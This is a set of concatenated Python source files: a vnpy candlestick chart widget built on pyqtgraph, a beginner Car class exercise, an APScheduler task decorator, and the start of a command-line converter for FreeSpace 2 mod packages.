是否完成了历史数据的读取\n initCompleted = False\n\n # ----------------------------------------------------------------------\n def __init__(self, parent=None, name=None):\n \"\"\"Constructor\"\"\"\n self.parent = parent\n self.name = name\n super(KLineWidget, self).__init__(parent)\n\n # 当前序号\n self.index = None # 下标\n self.countK = 60 # 显示的K线范围\n self.oldsize=0#rectd的hieght\n\n\n\n # 缓存数据\n\n\n self.datas = []\n self.listBar = []\n self.listVol = []\n self.listHigh = []\n self.listLow = []\n self.listSig = []\n self.listOpenInterest = []\n self.indicatorsFunManage= IndicatorsFunManage(self)\n self.arrows = []\n self.sars = []\n\n # 所有K线上信号图\n self.allColor = deque(['blue', 'green', 'yellow', 'white'])\n self.sigData = {}\n self.sigColor = {}\n self.sigPlots = {}\n\n # 初始化完成\n self.initCompleted = False\n\n # 调用函数\n self.initUi()\n\n # ----------------------------------------------------------------------\n # 初始化相关\n # ----------------------------------------------------------------------\n def initUi(self):\n \"\"\"初始化界面\"\"\"\n self.setWindowTitle(u'K线工具')\n # 主图\n self.pw = pg.PlotWidget()\n # 界面布局\n self.lay_KL = pg.GraphicsLayout(border=(100, 100, 100))\n self.lay_KL.setContentsMargins(10, 10, 10, 10)\n self.lay_KL.setSpacing(0)\n self.lay_KL.setBorder(color=(255, 255, 255, 255), width=0.8)\n self.lay_KL.setZValue(0)\n self.lay_KL.setMinimumHeight(140)\n self.KLtitle = self.lay_KL.addLabel(u'')\n self.pw.setCentralItem(self.lay_KL)\n # 设置横坐标\n xdict = {}\n self.axisTime = MyStringAxis(xdict, orientation='bottom')\n # 初始化子图\n self.initplotKline()\n self.initplotVol()\n self.initplotOI()\n # 注册十字光标\n self.crosshair = Crosshair(self.pw, self)\n # 设置界面\n self.vb = QtWidgets.QVBoxLayout()\n self.vb.addWidget(self.pw)\n self.setLayout(self.vb)\n # 初始化完成\n self.initCompleted = True\n self.oldsize=self.rect().height()\n\n self.customBox = {}\n\n # ----------------------------------------------------------------------\n def makePI(self, name):\n \"\"\"生成PlotItem对象\"\"\"\n vb = CustomViewBox(self)\n plotItem = pg.PlotItem(viewBox=vb, name=name, axisItems={'bottom': self.axisTime})\n plotItem.setMenuEnabled(False)\n plotItem.setClipToView(True)\n plotItem.hideAxis('left')\n plotItem.showAxis('right')\n plotItem.setDownsampling(mode='peak')\n plotItem.setRange(xRange=(0, 1), yRange=(0, 1))\n plotItem.getAxis('right').setWidth(60)\n plotItem.getAxis('right').setStyle(tickFont=QFont(\"Roman times\", 10, QFont.Bold))\n plotItem.getAxis('right').setPen(color=(255, 255, 255, 255), width=0.8)\n plotItem.showGrid(True, True)\n plotItem.hideButtons()\n\n return plotItem\n\n # ----------------------------------------------------------------------\n def initplotVol(self):\n \"\"\"初始化成交量��图\"\"\"\n self.pwVol = self.makePI('PlotVol' + self.name)\n self.volume = CandlestickItem(self.listVol)\n self.pwVol.addItem(self.volume)\n self.pwVol.setMaximumHeight((self.rect().height()-30)/4)\n self.pwVol.setMinimumHeight(12)\n self.pwVol.setXLink('PlotOI' + self.name)\n self.pwVol.hideAxis('bottom')\n self.lay_KL.nextRow()\n self.lay_KL.addItem(self.pwVol)\n self.lay_KL.adjustSize()\n\n\n # ----------------------------------------------------------------------\n def initplotKline(self):\n \"\"\"初始化K线子图\"\"\"\n self.pwKL = self.makePI('PlotKL' + self.name)\n self.candle = CandlestickItem(self.listBar)\n self.pwKL.addItem(self.candle)\n self.pwKL.setXLink('PlotOI' + self.name)\n self.pwKL.hideAxis('bottom')\n self.pwKL.setMinimumHeight((self.rect().height()-30)/3)\n\n self.lay_KL.nextRow()\n self.lay_KL.addItem(self.pwKL)\n\n # ----------------------------------------------------------------------\n def initplotOI(self):\n \"\"\"初始化持仓量子图\"\"\"\n self.pwOI = self.makePI('PlotOI' + self.name)\n self.curveOI = self.pwOI.plot()\n self.pwOI.setMaximumHeight((self.rect().height() - 30) / 4)\n self.pwOI.setMinimumHeight(20)\n\n self.lay_KL.nextRow()\n self.lay_KL.addItem(self.pwOI)\n\n\n self.indicatorsFunManage.addIndicators(\"OPI\")\n\n # ----------------------------------------------------------------------\n # 画图相关\n # ----------------------------------------------------------------------\n def plotVol(self, redraw=False, xmin=0, xmax=-1):\n \"\"\"重画成交量子图\"\"\"\n if self.initCompleted:\n self.volume.generatePicture(self.listVol[xmin:xmax], redraw) # 画成交量子图\n\n # ----------------------------------------------------------------------\n def plotKline(self, redraw=False, xmin=0, xmax=-1):\n \"\"\"重画K线子图\"\"\"\n if self.initCompleted:\n self.candle.generatePicture(self.listBar[xmin:xmax], redraw) # 画K线\n self.plotMark() # 显示开平仓信号位置\n\n # ----------------------------------------------------------------------\n def plotOI(self, xmin=0, xmax=-1):\n \"\"\"重画持仓量子图\"\"\"\n if self.initCompleted:\n # self.curveOI.setData(self.listOpenInterest[xmin:xmax]+[0], symbol='o', name=\"OpenInterest\")\n self.curveOI.setData(self.listOpenInterest[xmin:xmax] + [0],\n name=\"OpenInterest\" + self.name) # 去除symbol='o'\n\n def initIndicator(self, name):\n # 加载指标\n\n self.indicatorsFunManage.addIndicators(name)\n\n self.updateAll()\n\n\n\n # ----------------------------------------------------------------------\n def addSig(self, sig):\n \"\"\"新增信号图\"\"\"\n if sig in self.sigPlots:\n self.pwKL.removeItem(self.sigPlots[sig])\n self.sigPlots[sig] = self.pwKL.plot()\n self.sigColor[sig] = self.allColor[0]\n self.allColor.append(self.allColor.popleft())\n\n # ----------------------------------------------------------------------\n def showSig(self, datas):\n \"\"\"刷新信号图\"\"\"\n for sig in self.sigPlots:\n self.sigData[sig] = datas[sig]\n\n [self.sigPlots[sig].setData(datas[sig], pen=self.sigColor[sig][0], name=sig) \\\n for sig in self.sigPlots] # if sig in datas]\n\n # ----------------------------------------------------------------------\n def plotMark(self):\n \"\"\"显示开平仓信号\"\"\"\n # 检查是否有数据\n if len(self.datas) == 0:\n return\n for arrow in self.arrows:\n self.pwKL.removeItem(arrow)\n # 画买卖信号\n for i in range(len(self.listSig)):\n if self.listSig[i]:\n direction = self.listSig[i][\"direction\"]\n offset = self.listSig[i][\"offset\"]\n price = self.listSig[i][\"price\"]\n\n if direction == \"空\" and offset == \"开仓\":\n # arrow = pg.ArrowItem(pos=(i, price), angle=-90, brush=(255, 0, 0))\n arrow = pg.ArrowItem(pos=(i, price), angle=180, tipAngle=60, headLen=8, tailLen=3, tailWidth=5,\n pen={'color': 'w', 'width': 1}, brush='b')\n elif direction == \"多\" and offset == \"开仓\":\n # arrow = pg.ArrowItem(pos=(i, price), angle=90, brush=(255, 0, 0))\n arrow = pg.ArrowItem(pos=(i, price), angle=180, tipAngle=60, headLen=8, tailLen=3, tailWidth=5,\n pen={'color': 'w', 'width': 1}, brush='r')\n elif direction == \"空\" and offset == \"平仓\":\n # arrow = pg.ArrowItem(pos=(i, price), angle=-90, brush=(0, 0, 255))\n arrow = pg.ArrowItem(pos=(i, price), angle=0, tipAngle=40, headLen=8, tailLen=None, tailWidth=8,\n pen={'color': 'w', 'width': 1}, brush='b')\n elif direction == \"多\" and offset == \"平仓\":\n # arrow = pg.ArrowItem(pos=(i, price), angle=90, brush=(0, 0, 255))\n arrow = pg.ArrowItem(pos=(i, price), angle=0, tipAngle=40, headLen=8, tailLen=None, tailWidth=8,\n pen={'color': 'w', 'width': 1}, brush='r')\n self.pwKL.addItem(arrow)\n self.arrows.append(arrow)\n\n # ----------------------------------------------------------------------\n def updateAll(self):\n \"\"\"\n 手动更新所有K线图形,K线播放模式下需要\n \"\"\"\n datas = self.datas\n self.volume.update()\n self.candle.update()\n\n def update(view, low, high):\n vRange = view.viewRange()\n xmin = max(0, int(vRange[0][0]))\n xmax = max(0, int(vRange[0][1]))\n xmax = min(xmax, len(datas))\n if len(datas) > 0 and xmax > xmin:\n ymin = min(datas[xmin:xmax][low])\n ymax = max(datas[xmin:xmax][high])\n if ymin and ymax:\n view.setRange(yRange=(ymin, ymax))\n else:\n view.setRange(yRange=(0, 1))\n\n update(self.pwKL.getViewBox(), 'low', 'high')\n #update(self.pwVol.getViewBox(), 'volume', 'volume')\n #update(self.pwOI.getViewBox(), 'openInterest', 'openInterest')\n #update(self.curveOI.getViewBox(), 'openInterest', 'openInterest')\n self.update_vicefigure2(datas)\n\n def update_vicefigure2(self,datas):\n ##附图2更新\n def update_2(view,indicatorsFunManage):\n vRange = view.viewRange()\n xmin = max(0, int(vRange[0][0]))\n xmax = max(0, int(vRange[0][1]))\n xmax = min(xmax, len(datas))\n if len(datas) > 0 and xmax > xmin:\n ymin,ymax = indicatorsFunManage.getYRange(xmin,xmax,\"vicefigure2\")\n if ymin and ymax:\n view.setRange(yRange=(ymin, ymax))\n else:\n view.setRange(yRange=(0, 1))\n update_2(self.curveOI.getViewBox(), self.indicatorsFunManage )\n\n\n\n # ----------------------------------------------------------------------\n def plotAll(self, redraw=True, xMin=0, xMax=-1):\n \"\"\"\n 重画所有界面\n redraw :False=重画最后一根K线; True=重画所有\n xMin,xMax : 数据范围\n \"\"\"\n # xMax = len(self.datas) if xMax < 0 else xMax\n # self.countK = xMax-xMin\n # self.index = int((xMax+xMin)/2)\n if redraw:\n xmax = len(self.datas) if xMax < 0 else xMax\n xmin=max(0,xmax-self.countK)\n self.index = int((xmax + xmin) / 2)\n self.pwOI.setLimits(xMin=xMin, xMax=xMax)\n self.pwKL.setLimits(xMin=xMin, xMax=xMax)\n self.pwVol.setLimits(xMin=xMin, xMax=xMax)\n self.plotKline(redraw, xMin, xMax) # K线图\n self.plotVol(redraw, xMin, xMax) # K线副图,成交量\n self.plotOI(0, len(self.datas)) # K线副图,持仓量\n self.refresh()\n\n def refreshHeight(self):\n # super.__init__(QResizeEvent)\n # 如果窗口最大化,不修改比例,防御性设计\n # if self.isMaximized():\n # return\n if len(self.datas)!=0:\n height =self.rect().height()\n if height!=self.oldsize:\n self.oldsize=height\n height=(height-30)/4\n\n self.pwKL.setMinimumHeight(height * 2-24)\n self.pwVol.setMaximumHeight(height)\n self.pwVol.setMinimumHeight(12)\n self.pwOI.setMaximumHeight(height)\n self.pwOI.setMinimumHeight(12)\n\n #print height\n\n\n # ----------------------------------------------------------------------\n def refresh(self):\n \"\"\"\n 刷新三个子图的现实范围\n \"\"\"\n datas = self.datas\n minutes = int(self.countK / 2)\n xmin = max(0, self.index - minutes)\n xmax = xmin + 2 * minutes\n self.pwOI.setRange(xRange=(xmin, xmax))\n self.pwKL.setRange(xRange=(xmin, xmax))\n self.pwVol.setRange(xRange=(xmin, xmax))\n\n # ----------------------------------------------------------------------\n # 快捷键相关\n # ----------------------------------------------------------------------\n def onNxt(self):\n \"\"\"跳转到下一个开平仓点\"\"\"\n if len(self.listSig) > 0 and not self.index is None:\n datalen = len(self.listSig)\n self.index += 1\n while self.index < datalen and self.listSig[self.index] == 0:\n self.index += 1\n self.refresh()\n x = self.index\n y = self.datas[x]['close']\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onPre(self):\n \"\"\"跳转到上一个开平仓点\"\"\"\n if len(self.listSig) > 0 and not self.index is None:\n self.index -= 1\n while self.index > 0 and self.listSig[self.index] == 0:\n self.index -= 1\n self.refresh()\n x = self.index\n y = self.datas[x]['close']\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onDown(self):\n \"\"\"放大显示区间\"\"\"\n self.countK = min(len(self.datas), int(self.countK * 1.2) + 1)\n self.refresh()\n if len(self.datas) > 0:\n x = self.index - self.countK / 2 + 2 if int(\n self.crosshair.xAxis) < self.index - self.countK / 2 + 2 else int(self.crosshair.xAxis)\n x = self.index + self.countK / 2 - 2 if x > self.index + self.countK / 2 - 2 else x\n x=min(x,len(self.datas)-1)\n y = self.datas[x][2]\n # y = self.datas[x]['close']\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onUp(self):\n \"\"\"缩小显示区间\"\"\"\n # self.countK = max(3,int(self.countK/1.2)-1)\n self.countK = max(20, int(self.countK / 1.2) - 1) # 最小显示k线范围20\n self.refresh()\n if len(self.datas) > 0:\n x = self.index - self.countK / 2 + 2 if int(\n self.crosshair.xAxis) < self.index - self.countK / 2 + 2 else int(self.crosshair.xAxis)\n x = self.index + self.countK / 2 - 2 if x > self.index + self.countK / 2 - 2 else x\n x = min(x, len(self.datas)-1)\n y = self.datas[x]['close']\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onLeft(self):\n \"\"\"向左移动\"\"\"\n if len(self.datas) > 0 and int(self.crosshair.xAxis) > 2:\n x = int(self.crosshair.xAxis) - 1\n y = self.datas[x]['close']\n if x <= self.index - self.countK / 2 + 2 and self.index > 1:\n self.index -= 1\n self.refresh()\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onRight(self):\n \"\"\"向右移动\"\"\"\n if len(self.datas) > 0 and int(self.crosshair.xAxis) < len(self.datas) - 1:\n x = int(self.crosshair.xAxis) + 1\n y = self.datas[x]['close']\n if x >= self.index + int(self.countK / 2) - 2:\n self.index += 1\n self.refresh()\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n # 界面回调相关\n # ----------------------------------------------------------------------\n def onPaint(self):\n \"\"\"界面刷新回调\"\"\"\n view = self.pwKL.getViewBox()\n vRange = view.viewRange()\n # xmin = max(0,int(vRange[0][0]))\n # xmax = max(0,int(vRange[0][1]))\n # self.index = int((xmin+xmax)/2)+1\n\n # ----------------------------------------------------------------------\n def resignData(self, datas):\n \"\"\"更新数据,用于Y坐标自适应\"\"\"\n self.crosshair.datas = datas\n\n def viewXRangeChanged(low, high, self):\n vRange = self.viewRange()\n xmin = max(0, int(vRange[0][0]))\n xmax = max(0, int(vRange[0][1]))\n xmax = min(xmax, len(datas))\n if len(datas) > 0 and xmax > xmin:\n ymin = min(datas[xmin:xmax][low])\n ymax = max(datas[xmin:xmax][high])\n if ymin and ymax:\n self.setRange(yRange=(ymin, ymax))\n else:\n self.setRange(yRange=(0, 1))\n\n view = self.pwKL.getViewBox()\n view.sigXRangeChanged.connect(partial(viewXRangeChanged, 'low', 'high'))\n view = self.pwVol.getViewBox()\n view.sigXRangeChanged.connect(partial(viewXRangeChanged, 'volume', 'volume'))\n\n\n ##附图2更新\n self.resign_vicefigure2(datas)\n\n def resign_vicefigure2(self,datas):\n ##附图2更新\n def viewXRangeChanged_2(indicatorsFunManage, self):\n vRange = self.viewRange()\n xmin = max(0, int(vRange[0][0]))\n xmax = max(0, int(vRange[0][1]))\n xmax = min(xmax, len(datas))\n if len(datas) > 0 and xmax > xmin:\n ymin,ymax = indicatorsFunManage.getYRange(xmin,xmax,\"vicefigure2\")\n if ymin and ymax:\n self.setRange(yRange=(ymin, ymax))\n else:\n self.setRange(yRange=(0, 1))\n\n view = self.pwOI.getViewBox()\n view.sigXRangeChanged.connect(partial(viewXRangeChanged_2, self.indicatorsFunManage))\n\n # ----------------------------------------------------------------------\n # 数据相关\n # ----------------------------------------------------------------------\n def clearData(self):\n \"\"\"清空数据\"\"\"\n # 清空数据,重新画图\n self.time_index = []\n self.listBar = []\n self.listVol = []\n self.listLow = []\n self.listHigh = []\n self.listOpenInterest = []\n self.listSig = []\n self.sigData = {}\n self.arrows = []\n self.datas = None\n self.sarDatas=None\n\n # ----------------------------------------------------------------------\n def updateSig(self, sig):\n \"\"\"刷新买卖信号\"\"\"\n self.listSig = sig\n self.plotMark()\n # ----------------------------------------------------------------------\n def onBar(self, bar, nWindow=20):\n \"\"\"\n 新增K线数据,K线播放模式\n nWindow : 最大数据窗口\n \"\"\"\n # 是否需要更新K线\n newBar = False if len(self.datas) > 0 and bar.datetime == self.datas[-1].datetime else True\n nrecords = len(self.datas) if newBar else len(self.datas) - 1\n bar.openInterest = np.random.randint(0,\n 3) if bar.openInterest == np.inf or bar.openInterest == -np.inf else bar.openInterest\n recordVol = (nrecords, bar.volume, 0, 0, bar.volume) if bar.close < bar.open else (\n nrecords, 0, bar.volume, 0, bar.volume)\n if newBar and any(self.datas):\n self.datas.resize(nrecords + 1, refcheck=0)\n self.listBar.resize(nrecords + 1, refcheck=0)\n self.listVol.resize(nrecords + 1, refcheck=0)\n elif any(self.datas):\n self.listClose.pop()\n self.listOpen.pop()\n self.listLow.pop()\n self.listHigh.pop()\n self.listOpenInterest.pop()\n if any(self.datas):\n self.datas[-1] = (bar.datetime, bar.open, bar.close, bar.low, bar.high, bar.volume, bar.openInterest)\n self.listBar[-1] = (nrecords, bar.open, bar.close, bar.low, bar.high)\n self.listVol[-1] = recordVol\n else:\n self.datas = np.rec.array(\n [(datetime, bar.open, bar.close, bar.low, bar.high, bar.volume, bar.openInterest)], \\\n names=('datetime', 'open', 'close', 'low', 'high', 'volume', 'openInterest'))\n self.listBar = np.rec.array([(nrecords, bar.open, bar.close, bar.low, bar.high)], \\\n names=('datetime', 'open', 'close', 'low', 'high'))\n self.listVol = np.rec.array([recordVol], names=('datetime', 'open', 'close', 'low', 'high'))\n self.resignData(self.datas)\n self.axisTime.update_xdict({nrecords: bar.datetime})\n self.listOpen.append(bar.open)\n self.listClose.append(bar.close)\n self.listLow.append(bar.low)\n self.listHigh.append(bar.high)\n self.listOpenInterest.append(bar.openInterest)\n # if newBar:\n # xMax = nrecords + 1\n # xMin = max(0, xMax - self.countK) # 最小显示区间\n # self.index=int(xMax+xMin)/2\n\n # if self.pwKL.getViewBox().mousePress == True:\n # print(\"sssssssssss\")\n\n # if self.pwKL.getViewBox().mousePress == False: ##self.mousePress==false,不在执行刷新操作\n\n\n\n xMax = self.index + self.countK\n xMin = self.index - self.countK\n #xMin=(0,xMin)\n if xMin<0:\n xMin=0\n\n if not newBar:\n self.updateAll()\n\n self.plotAll(False, xMin, xMax)\n self.crosshair.signal.emit((None, None))\n if self.indicatorsFunManage:\n self.indicatorsFunManage.updateIndicators()\n\n # ----------------------------------------------------------------------\n def loadData(self, datas):\n \"\"\"\n 载入pandas.DataFrame数据\n datas : 数据格式,cols : datetime, open, close, low, high\n \"\"\"\n # 设置中心点时间\n self.index = 0\n\n # 绑定数据,更新横坐标映射,更新Y轴自适应函数,更新十字光标映射\n datas['time_int'] = np.array(range(len(datas.index)))\n self.datas = datas[['open', 'close', 'low', 'high', 'volume', 'openInterest']].to_records()\n self.axisTime.xdict = {}\n xdict = dict(enumerate(datas.index.tolist()))\n self.axisTime.update_xdict(xdict)\n self.resignData(self.datas)\n # 更新画图用到的数据\n self.listBar = datas[['time_int', 'open', 'close', 'low', 'high']].to_records(False)\n self.listOpen=list(datas['open'])\n self.listClose=list(datas['close'])\n self.listHigh = list(datas['high'])\n self.listLow = list(datas['low'])\n self.listOpenInterest = list(datas['openInterest'])\n # 成交量颜色和涨跌同步,K线方向由涨跌决定\n datas0 = pd.DataFrame()\n datas0['open'] = datas.apply(lambda x: 0 if x['close'] >= x['open'] else x['volume'], axis=1)\n datas0['close'] = datas.apply(lambda x: 0 if x['close'] < x['open'] else x['volume'], axis=1)\n datas0['low'] = datas0['open']\n datas0['high'] = datas0['close']\n datas0['time_int'] = np.array(range(len(datas.index)))\n self.listVol = datas0[['time_int', 'open', 'close', 'low', 'high']].to_records(False)\n # 调用画图函数\n self.plotAll(True, 0, len(self.datas))\n\n def loadDataBar(self, datas):\n \"\"\"\n 载入pandas.DataFrame数据\n datas : 数据格式,'symbol','vtSymbol','exchange','open','high','low','close','date','time1','datetime','volume','openInterest'\n \"\"\"\n print(datas)\n self.index = 0\n\n # 绑定数据,更新横坐标映射,更新Y轴自适应函数,更新十字光标映射\n datas['time_int'] = np.array(range(len(datas.index)))\n\n self.datas = datas[['datetime', 'open', 'close', 'low', 'high', 'volume', 'openInterest']].to_records(False)\n # self.datas = datas[['symbol','vtSymbol','exchange','open','high','low','close','date','time1','datetime','volume','openInterest']].to_records()\n self.axisTime.xdict = {}\n # xdict = dict(enumerate(datas.index.tolist()))\n xdict = dict(enumerate(datas['datetime'].tolist()))\n self.axisTime.update_xdict(xdict)\n self.resignData(self.datas)\n # 更新画图用到的数据\n self.listBar = datas[['time_int', 'open', 'close', 'low', 'high']].to_records(False)\n self.listOpen = list(datas['open'])\n self.listClose = list(datas['close'])\n self.listHigh = list(datas['high'])\n self.listLow = list(datas['low'])\n self.listOpenInterest = list(datas['openInterest'])\n # 成交量颜色和涨跌同步,K线方向由涨跌决定\n datas0 = pd.DataFrame()\n datas0['open'] = datas.apply(lambda x: 0 if x['close'] >= x['open'] else x['volume'], axis=1)\n datas0['close'] = datas.apply(lambda x: 0 if x['close'] < x['open'] else x['volume'], axis=1)\n datas0['low'] = datas0['open']\n datas0['high'] = datas0['close']\n datas0['time_int'] = np.array(range(len(datas.index)))\n self.listVol = datas0[['time_int', 'open', 'close', 'low', 'high']].to_records(False)\n # 调用画图函数\n self.plotAll(True, 0, len(self.datas))\n\n ##VtBarData 结构\n def loadDataBarArray(self, record):\n txtData = pd.DataFrame.from_records(record, index=\"datetime\")\n # txtData = txtData.rename(columns = {0:'symbol', 1:\"vtSymbol\",2:\"exchange\",3:\"open\",4:\"high\",5:\"low\",6:\"close\",7:\"date\",8:\"time\",9:\"datetime\",10:\"volume\",11:\"openInterest\"})\n\n self.loadData(txtData)\n\n\n\n########################################################################\n# 功能测试\n########################################################################\nimport sys\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n # 界面设置\n cfgfile = QtCore.QFile('css.qss')\n cfgfile.open(QtCore.QFile.ReadOnly)\n styleSheet = cfgfile.readAll()\n styleSheet = unicode(styleSheet, encoding='utf8')\n app.setStyleSheet(styleSheet)\n # K线界面\n # ui = KLineWidget()\n # ui.show()\n # ui.KLtitle.setText('rb1701',size='20pt')\n # ui.loadData(pd.DataFrame.from_csv('data.csv'))\n\n ui = KLineWidget(name=\"opt\")\n ui.show()\n ui.KLtitle.setText('rb1701', size='20pt')\n\n # txtData = pd.DataFrame.from_csv('D:/data/day/rb1101.txt',header=None,index_col=7)\n txtData = pd.DataFrame.from_csv('E:/Data/day/rb1101.txt', header=None, index_col=7)\n\n\n\n txtData = txtData.rename(\n columns={0: 'symbol', 1: \"vtSymbol\", 2: \"exchange\", 3: \"open\", 4: \"high\", 5: \"low\", 6: \"close\", 7: \"date\",\n 8: \"time\", 9: \"datetime\", 10: \"volume\", 11: \"openInterest\"})\n\n ui.loadDataBar(txtData)\n app.exec_()\n","sub_path":"vnpy/trader/widget/uiKLine.py","file_name":"uiKLine.py","file_ext":"py","file_size_in_byte":40092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"490648334","text":"# Create a class called Car. In the __init__(), allow the user to specify the following attributes: price, speed, fuel, mileage. If the price is greater than 10,000, set the tax to be 15%. Otherwise, set the tax to be 12%.\n\n# Create six different instances of the class Car. In the class have a method called display_all() that returns all the information about the car as a string. In your __init__(), call this display_all() method to display information about the car once the attributes have been defined.\n\nclass Car:\n\tdef __init__(self, price, speed, fuel, mileage):\n\t\tself.price = price\n\t\tself.speed = speed\n\t\tself.fuel = fuel\n\t\tself.mileage = mileage\n\t\tself.tax = 0\n\tdef taxed(self):\n\t\tif self.price > 10000:\n\t\t\tself.tax = 0.15\n\t\telse:\n\t\t\tself.tax = 0.12\n\t\tprint(self.tax)\n\t\treturn self\n\tdef display_all(self):\n\t\tprint(f\"Price: {self.price} \\nSpeed: {self.speed} \\nFuel: {self.fuel} \\nMileage: {self.mileage} \\nTax: {self.tax}\")\ncar1 = Car(2000, 35, \"Full\", 15)\ncar2 = Car(2000, 5, \"Not Full\", 105)\ncar3 = Car(2000, 15, \"Kind of Full\", 95)\ncar4 = Car(2000, 25, \"Full\", 25)\ncar5 = Car(2000, 45, \"Empty\", 25)\ncar6 = Car(20000000, 35, \"Empty\", 15)","sub_path":"python_OOP/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440614431","text":"from datetime import date\n\nfrom loop import event_loop\nfrom .scheduler import scheduler\n\nDATE_TASK = 0\nCRON_TASK = 1\n\n\nclass APTask:\n def __init__(self, task_type, fn):\n self.task_type = task_type\n self.fn = fn\n self.job = None\n\n async def start(self, run_datetime=None, cron_rule=None,\n args=(), kwargs=None,\n *targs, **tkwargs):\n if self.task_type == DATE_TASK:\n if not isinstance(run_datetime, date):\n raise Exception(\n 'run_datetime param is not date/datetime instance'\n )\n self.job = await event_loop.run_in_executor(\n None,\n lambda: scheduler.add_job(\n self.fn, 'date',\n args=args,\n kwargs=kwargs or {},\n run_date=run_datetime,\n *targs, **tkwargs\n )\n )\n elif self.task_type == CRON_TASK:\n self.job = await event_loop.run_in_executor(\n None,\n lambda: scheduler.add_job(\n self.fn, 'cron',\n args=args,\n kwargs=kwargs,\n *targs,\n **dict(tkwargs, **cron_rule)\n )\n )\n else:\n raise Exception('Unknown type of task')\n\n\ndef bg_task(task_type):\n def dec(fn):\n fn.task = APTask(task_type, fn)\n return fn\n\n return dec\n","sub_path":"background/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"444373655","text":"## Copyright 2014 ngld \n##\n## Licensed under the Apache License, Version 2.0 (the \"License\");\n## you may not use this file except in compliance with the License.\n## You may obtain a copy of the License at\n##\n## http://www.apache.org/licenses/LICENSE-2.0\n##\n## Unless required by applicable law or agreed to in writing, software\n## distributed under the License is distributed on an \"AS IS\" BASIS,\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n## See the License for the specific language governing permissions and\n## limitations under the License.\n\nfrom __future__ import print_function\nimport logging\nlogging.basicConfig(level=logging.INFO, format='%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s')\nlogging.getLogger().addHandler(logging.FileHandler('converter.log'))\n\nimport sys\nimport os\nimport argparse\nimport pickle\nimport hashlib\nimport json\nimport time\nimport datetime\nimport signal\nimport util\nimport progress\nfrom fso_parser import EntryPoint\nfrom fs2mod import convert_modtree, find_mod, ModInfo2\nfrom qt import QtCore\nfrom six import StringIO\n\n\ndef show_progress(prog, text):\n sys.stdout.write('\\r %3d%% %s' % (prog * 100, text))\n sys.stdout.flush()\n\ncache = {\n 'mods': {},\n 'last_fetch': 0\n}\ncache_path = os.path.expanduser('~/.fs2mod-py/cache.pick')\n\n\ndef list_modtree(mods, level=0):\n for mod in mods:\n print(' ' * 2 * level + mod.name)\n list_modtree(mod.submods, 1)\n\n\ndef main(args):\n global cache, cache_path\n \n progress.reset()\n progress.set_callback(show_progress)\n \n parser = argparse.ArgumentParser()\n subs = parser.add_subparsers(dest='action')\n \n list_parser = subs.add_parser('list', help='list mods')\n list_parser.add_argument('--update', action='store_true', default=False, help='update the mod list')\n \n convert_parser = subs.add_parser('convert', help='generates a fs2mod file for one of the listed mods')\n convert_parser.add_argument('modname')\n convert_parser.add_argument('outpath', help='path to the fs2mod file')\n \n json_parser = subs.add_parser('json', help='generate a json file for the passed mods')\n json_parser.add_argument('modname', nargs='+', help='several names of mods or just \"all\"')\n json_parser.add_argument('-o', dest='outpath', help='output file', type=argparse.FileType('w'), default=sys.stdout)\n json_parser.add_argument('-p', dest='pretty', help='pretty print the output', action='store_true')\n \n args = parser.parse_args(args)\n \n # Load our cache\n if os.path.exists(cache_path):\n with open(cache_path, 'rb') as stream:\n try:\n cache = pickle.load(stream)\n except:\n logging.exception('Failed to read the cache at %s!', cache_path)\n \n if args.action == 'list':\n if args.update or len(cache['mods']) == 0:\n logging.info('Fetching current mod list...')\n \n cache['mods'] = EntryPoint.get_mods()\n cache['last_fetch'] = time.time()\n \n # Save the updated cache.\n if not os.path.isdir(os.path.dirname(cache_path)):\n os.makedirs(os.path.dirname(cache_path))\n \n with open(cache_path, 'wb') as stream:\n pickle.dump(cache, stream)\n \n ftime = datetime.datetime.fromtimestamp(cache['last_fetch'])\n print('This list was last updated on ' + ftime.strftime('%c'))\n list_modtree(cache['mods'])\n \n elif args.action == 'convert':\n if os.path.exists(args.outpath):\n logging.error('\"%s\" already exists! I won\\'t overwrite it!', args.outpath)\n return\n \n # Look for the mod...\n mod = find_mod(cache['mods'], args.modname)\n if mod is None:\n logging.error('Couldn\\'t find mod \"%s\"!', args.modname)\n return\n \n logging.info('Converting mod...')\n mod = convert_modtree([mod])[0]\n \n logging.info('Writing fs2mod file...')\n mod.generate_zip(args.outpath)\n \n logging.info('Done!')\n \n elif args.action == 'json':\n # Look for our mods\n \n if 'all' in args.modname:\n mods = cache['mods']\n else:\n mods = []\n for mod in args.modname:\n m = find_mod(cache['mods'], mod)\n if m is None:\n logging.warning('Mod \"%s\" was not found!', mod)\n else:\n mods.append(m)\n \n if len(mods) < 1:\n logging.error('No mods to convert!')\n return\n \n app = QtCore.QCoreApplication([])\n \n class ConvertTask(progress.Task):\n def work(self, mod):\n self.add_work(mod.submods)\n \n result = ModInfo2()\n cur = mod\n while cur.parent is not None:\n cur = cur.parent\n if cur.name != '':\n result.dependencies.append(('mod_name', cur.name))\n \n for i, sub in enumerate(mod.submods):\n mod.submods[i] = sub.name\n \n result.read(mod)\n self.post(result)\n \n master = progress.Master()\n task = ConvertTask()\n task.add_work(mods)\n \n def update_progress():\n total, items = task.get_progress()\n text = []\n for item in items.values():\n text.append('%3d%% %s' % (item[0] * 100, item[1]))\n \n progress.update(total, '\\n'.join(text))\n \n def finish():\n app.quit()\n \n task.progress.connect(update_progress)\n task.done.connect(finish)\n \n def core():\n signal.signal(signal.SIGINT, lambda a, b: app.quit())\n master.start_workers(5)\n master.add_task(task)\n app.exec_()\n master.stop_workers()\n \n util.QUIET = True\n out = StringIO()\n progress.init_curses(core, out)\n 